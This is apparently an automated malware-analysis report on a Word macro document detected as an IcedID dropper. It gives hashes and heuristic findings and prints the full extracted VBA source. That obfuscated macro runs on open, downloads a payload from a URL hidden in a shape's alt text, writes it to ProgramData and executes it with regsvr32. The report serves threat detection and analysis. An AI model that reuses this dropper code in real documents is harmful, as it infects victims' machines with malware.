Office (OOXML) malware analysis — malicious · 344acc38e4fdd607

MALICIOUS

Office (OOXML)

140.7 KB Created: 2020-10-13 10:55:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16

MD5: 3d64b27330e93438da9f4356df938f2b SHA-1: 883d98b76fbf6a5560f43186c8f3b646b745c96a SHA-256: 344acc38e4fdd6076213380150ffc20292be31ae065c09720e0ec6fe9fd9c2dc

230 Risk Score

Heuristics 6

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set cDfrj = CreateObject("Script" + BGkvX)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	11953 bytes
SHA-256: `f55d8974d00d8d8ca7858a341b3fce2d76d698df0c0e8bf5ba4dcb9bdacf323f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "YJWeH" Sub sfVeF(ETqev, Optional ByVal ouuCU As String = "c:\programdata\MYgcJ.txt", Optional ByVal BGkvX As String = "ing.FileSystemObject") ' Opinionated ' Reviser embrasure haughty suspect disbursement soughtafter ' Surfeit seaweed ' Semaphoring feelingly allotting apparelled ' Bitterness pasted mentors ' Fumaroles refocussing drizzled actor cresting deadens ' Determinant luxor disappointed inexactitude cackling ' Connectivity slenderest ' Null incredulous deformity scrutinies ' Cockatoo cactus raincloud ' Comedian epitaxial ' Bowing slept succinctness crumbs ' Crediting sputter mayor ' Materialist pimple ' Dyspeptic sociable autoignition Set cDfrj = CreateObject("Script" + BGkvX) ' Uninhibitedly indicator understocked shunter consorts ' Negotiation aeronaut honourable wearing ' Gaits ' Yours alley iglu interdependent ' Preservationists archduke selfdestructive cheep arrestable lien ' Area proffer Set clycy = cDfrj.CreateTextFile(ouuCU) ' Durables ' Fleetingly brat ' Irregularity stomping grieving discarded robin ' Duplicities nasally clycy.WriteLine ETqev ' Dirtiness decelerated funicular ' Bioscope servicing ' Skyline ' Remunerated ' Crudely sanest ruminant hirings admen delhi clycy.Close ' Sailors razzmatazz cavorts ' Negotiators takeovers glisten ' Sputum moors uninitiated attenuator ecclesiastically ' Crocus metaphysical dudgeon sheaf ' Sculptors realistic sodas ' Reunion moneys toymaker anyone ' Reformed sacramental consented implicitly developed professions ' Bearers beany ridiculing sailer crusading telltale ' Pickerels heliosphere shear ' Formulate ' Cosmetics back studios multinationals slur ' Spitefully glowing itself subnormal damascus asymmetric ' Vacuous singularly profligacy aztecs maggot dulcet ' Expenditure crossways jetlagged lexeme superscript herbicide ' Pioneered altercation ' Exfoliation pluses condenser egret infill ' Sleeved abjectly thumbprint flinty storming ' Spontaneous loosen ' Requiring glaciological reappointed comber deciphering ragged ' Practicality ' Absolve vitreous restorers sideshow ' Knowing perfunctorily ' Paracetamol lipstick ding ' Whoever ' Riboflavin drip untrusted divinely tidying uplifting ' Cartridges solely bangle crosschecking moorland ' Mnemonic hurray netball ' Positivism ' Ankara unreconciled ' Fingerprint succinct streakers ' Undone shrews jingled fleshless poky ' Cased embassies ' Greyish rule ' Xenophobia ' Centaur ruling rustiness affidavit debated ' Blockages justifiably ' Wellgrounded cinemas kinswoman offshoot End Sub ' Duality redound scorning boded ' Steamer ' Skinless hailing rialto irking cog ' Slenderness carnivals infarctions cowards wasteful ' Folding programmable parliamentarian enlistment Sub AutoOpen() ' Delirium sacked ' Mathematical tensest vehicle inheritances scalloped lymphomas ' Conciliate anorexia spaceships ' Dermatologist prosecutorial currencies spotters ' Crunching circumferences strong biotechnologist ' Prance evaluate ' Stymie lurker ' Flyover caliph amino ' Recouple dinars elongated ' Titan windowless ' Internationalists simplistically ' Vaguely recreating contemplation ' Girders underwent pinholes ' Foam restaurant carbuncle ' Projective ' Pipework linings ' Diacritics rurally ' Fissures unsmooth faceting ' Uncrackable glasses nutritive compressibility ' Bequeathed compressible ladylike sunrise globally ' Coolest ' Perfidiously harmonically oafish horsewhipped wring ' Remotely tweet soaker ambassadorial ' Doctor pluralists citizenship densest ' Rehabilitating alluded unconverted ' Liquidations distillery ' Diffracts judgment hustings ' Suggestion misunderstandings irruption ' Affectation collaborations hopped Dim yvBzH As New JyFrJ ' Betel unavoidable ' Comprehends tanking ' Counterpoints dispenser acids ' Pentagon unavoidably barricades smartened ' Irresolute baste ' Distracted ' Trefoils shoals ETqev = yvBzH.Ibgof("MSXML2.serverXMLHTTP") ' Cormorant obstinate unbar cautioned spaceships ' Unexploded contender ' Filigree tinting ' Permitting behavioural imperilled ' Reshuffled hat suicidally sfVeF ZVToT(ETqev) ' Rescued ' Inkwells serves ' Bargepole unscratched dimming ' Expression save ' Reclaiming ' Raving conscript edits dosed misrepresentation ' Lumberjack tarsus roundtheclock closet ' Manpower crinkle xHhFv orKrI(0) + "vr32 c:\programdata\MYgcJ.txt", "ws" End Sub Function dOcXQ(tYAtR, EGguq) ' Crofts pavements ostensible unfair imitator ' Igneous contemporaneity ' Muddiest ' Versions snobbery ' Effort dirtier replicator proves ' Slaughterings labyrinthine quiver ices intransitive embarrass overhaul dOcXQ = Split(tYAtR, EGguq) End Function Attribute VB_Name = "XqpTk" ' Inappropriateness squeaky debars ' Fruitlessly ' Hoe smallpox publishable ' Constituting ' Dictionaries Function ZVToT(bsYFo) ' Enlace barren rituals subprogram intractable ' Turncoats mispronunciation ' Infirmary stropping amiable mortal ' Interned sensibility unite ZVToT = StrConv(bsYFo, vbUnicode) ' Overestimating ' Busman dredge exoticism mauler specialised ' Processors spirals possessives ' Vibrating ' Munch overseas womaniser restfulness ' Ells craziness housemaid clawing End Function ' Partially debacle outflanked unstoppable ' Photocopied translate atlas ' Session animosities ' Breed subordinate commitment celestially ' Wended backwardness boorishly grandmaster Function uXtke() ' Lowland procurement farthest hasty abstrusely ' Watchmakers presbytery requiem ' Wetter vertebral discovers cedilla ' Footstool dice westerner virtue foreseeable touched ' Locking bellicose ' Plaster dux plotters ' Marketing suffers april bloodshed ' Administrations europe addition workroom ' Ancestries triggering ' Remarkable lethargically sonora resignation ' Cosiest repacking thriller With ActiveDocument.shapes(1) uXtke = .AlternativeText End With End Function ' Reprovingly unmodifiable ' Benefactions oblique exporters ' Normal bandiest impeached recuperates ' Discarding chargeable brasiers ' Beauty valuation arithmetically ' Dissolution profited Function orKrI(HoPuF) ' Las sufficed stumble travelogue ' Installations excerpt fraud layout ' Trappings petit ' Aped mockingbird thoughtlessness ' Unquenchable strum egomania gambling ' Musingly crucify resonator coincides evocatively ' Oh ' Connections grasps mimicked willpower begun ' Burdensome gulfs molluscan faeces ' Joked overripe rumour trustful intruders ' Layby bicker excel france ' Selling ' Bulkhead ' Recapitalisation servicemen ' Kleptomaniac roundabout breakfasting sandstone LvQQE = uXtke() PSbdd = dOcXQ(LvQQE, "###") veIMu = PSbdd(HoPuF) orKrI = veIMu End Function Attribute VB_Name = "JyFrJ" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Reverse(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i Reverse = StrNew End Function ' Plagiarised spout ' Braincell ungovernable ' Bumper playfulness soakings ' Parades sheikhs resound womb ' Placement incriminates compulsively ' Valhalla bombers misquotation institutionally Function Ibgof(WGyWd) ' Password waterproof ' Hotair conveniences frisked rinsing ' Victors untactful marvellously ' Neurosis preserved echinoderm unceasingly ' Adorn ' Inventive removes yankees anthropocentric mussel Dim yOYRw As Object ' Tertiaries pegged ' Unhealthy waters ' Typists ' Reintroduces conger carnation undue ' Overtones maoists hesitantly invective ' Angered ' Knock resumption tumescent ' Photocopying pleasing ' Dopamine leftwards bolivia ' Bauxite uncluttered ' Tainting tits clearly showjumpers participant beater sweeper Set yOYRw = CreateObject(WGyWd) ' Absentmindedly mean stockbroker mournfulness ' Pizza pang recommending extinguisher copyists doormat artist overtax ' Sake arrowed waywardness albania editions lull ' Jewish ' Languages fiddling hearten ' Unkindness packing mistier modem trunking faking ' Unsteady ' Loanwords discernment mayflies ' Tuition coarser osmium ' Extralinguistic vagabonds ' Stroller urethrae ' Entertain barefoot noiseless ' Tiresomely freshman jesuit moments ' Prestige ' Infernally fictional reside ' Eyeteeth unworn unknightly ' Resubstitute ' Cognac unmaking ' Categorical destabilised besets commemorates blotched rediscovery ' Minimisation unchaining ladybug invades ' Jury ' Prevail harmfully miming ' Evens monarchical ' Borstal task roarer dialectics polarised untruthful WIksp = orKrI(1) ' Promotion swoons microfiche ridiculousness ' Institutionalism mothered gymnastics ' Pillaging vulva vino ungodly sniggers ' Tidings reiterated ' Westernised nowhere injunctions yOYRw.Open "GET", Reverse(WIksp), False ' Adventurers disobedient ' Duelling ' Imprint tinny severs boffin uproot dispersant ' Embarking brag ceremonious upbeat firefighters yOYRw.Send ' Shoeing hurry vizier ' Fonts violating impedimenta masseuse crystallography punier ' Adduces popped neighing pedant evolved libeled ' Mobster trekker hesitantly ' Rookies burst garbs desks Ibgof = yOYRw.responsebody End Function Attribute VB_Name = "kYuTd" Sub xHhFv(hQnPh, iKMHC) ' Delineation centrifuges ' Bicarbonate shoddiness ' Stalwart lagoon ' Defender collecting winged intergalactic perspicuity geopolitical bacterial ' Uncoil concomitantly codify satirising Set lSWzP = CreateObject(iKMHC + "cript.shell") ' Squelching bedouin acidify precociousness ' Discards bootlaces amounting venders ' Masquerades lozenge ' Lacklustre cherishing khoikhoi ' Sequoia alphabet ceremonious overturn ' Preparatory ' Orderless ' Augmented contorts unsurpassed submarine ' Incarceration fightback ' Mileages comings bonemeal ' Tessellated conjuring culpably ' Interfaces builds dermatological murder ' Signpost prematurely typing ' Tricksters deterred viva wrathfully ' Structuralists banner statistically wast ' Pondering classiest ' Redial grisly ' God stateless dishpan kicker ' Reciprocally forcibly ballbearings voucher ' Shuttling hornbeam wore replications ' Cower champions retreating adjudicating ' Emancipatory pallmall overrunning enslaved declarers ' Purlins dictionary ' Egocentric maximal editor budgetary liberalised perfume ' Doctorate swing teammate forbids ' Lamentable miraculousness ' Remainders sander unmistakeable camping ' Motivator ' Boxers ' Prayer incensing serpent ' Shoestring tobogganing litter ' Anger porpoise pulping gushes ' Combed apsis refillable head twiddler ' Beefier ' Goodly sibling yens worries ' Marinate superciliousness aquarium ' Mallard flagella pollarded pungency ' Subhuman ' Freshens payee asterisk ' Scooping hyperfine ' Contented fealty swim windscreens documentaries ' Perusing eluted ' Harrier rusticate morons deified sedately glitzy quells ' Crossexamines enterprises humbly shampooed ' Dais ' Oversubscribed strafe exhilarate catsuit polynomial ' Thrown ' Suggest characterise lSWzP.exec hQnPh ' Concisely ' Shabbiest dactylic rasp atmospherics ' Outlay retral bowstring familial ' Accumulations ' Tarnished idyllically foster mincing parietal bobbed axed ' Quern meddlers enforceability fluid leech End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	45056 bytes
SHA-256: `ab69bf33adb73696d318a0a92bef597ee68b41e978ae6fcf8705de3777c41744`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.